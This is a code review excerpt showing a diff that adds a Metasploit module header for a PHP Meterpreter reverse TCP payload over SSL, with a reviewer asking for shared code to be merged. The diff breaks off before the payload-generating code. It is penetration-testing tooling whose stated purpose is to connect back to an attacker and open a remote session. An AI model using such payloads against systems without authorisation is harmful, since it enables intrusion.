modules/payloads/singles/php/meterpreter_reverse_tcp_ssl.rb

```diff
@@ -0,0 +1,50 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/meterpreter_php'
+require 'msf/base/sessions/meterpreter_options'
+
+
+module MetasploitModule
+
+  CachedSize = 25141
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'PHP Meterpreter, Reverse TCP Inline using SSL',
+      'Description'   => 'Connect back to attacker with SSL and spawn a Meterpreter server (PHP)',
+      'Author'        => ['RageLtMan <rageltman[at]sempervictus>'],
+      'Platform'      => 'php',
+      'Arch'          => ARCH_PHP,
+      'Handler'       => Msf::Handler::ReverseTcpSsl,
+      'License'       => MSF_LICENSE,
+      'Session'       => Msf::Sessions::Meterpreter_Php_Php))
+  end
+
+  def generate
```

Comment:
I'd like to see some merging of shared code and generate in meterpreter_reverse_tcp.rb.